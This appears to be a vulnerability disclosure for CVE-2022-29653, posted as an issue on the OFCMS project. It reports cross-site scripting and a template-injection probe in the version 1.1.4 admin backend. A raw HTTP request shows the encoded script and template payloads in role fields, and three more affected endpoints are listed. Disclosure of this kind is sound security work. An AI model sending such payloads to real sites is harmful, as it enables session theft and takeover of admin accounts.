CVE-2022-29653: There are many cross-site scripting vulnerabilities in ofCMS system background · Issue #I53COA · 欧福/ofcms - Gitee.com

[Suggested description]
There are many cross-site scripting vulnerabilities in the background of OFCMS system version 1.1.4, because the special characters entered are not effectively escaped.

[Vulnerability Type]
Cross Site Scripting (XSS)

[Vendor of Product]
https://gitee.com/oufu/ofcms

[Affected Product Code Base]
v1.1.4

[Affected Component]

POST /ofcms/admin/comn/service/update.json?sqlid=system.role.update HTTP/1.1
Host: localhost:7000
Content-Length: 94
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:7000
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:7000/ofcms/admin/f.html?p=system/role/edit.html&role_id=3&_fsUuid=820e45c9-7f52-4e8d-b917-930c4b13153c
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=A81B589572EF210191B7C30F017A814D
Connection: close

role_id=3&role_name=%24%7B2*2%7D&role_desc=Test+freemarker+%3Cscript%3Ealert(1)%3C%2Fscript%3E

[Attack Type]
Remote

[Impact Code execution]
true

[Vulnerability to prove]
Case 1:
/ofcms/admin/comn/service/update.json?sqlid=system.menu.update

Case 2:
/ofcms/admin/comn/service/update.json?sqlid=cms.bbs.update

Case 3:
/ofcms/admin/comn/service/update.json?sqlid=cms.ad.update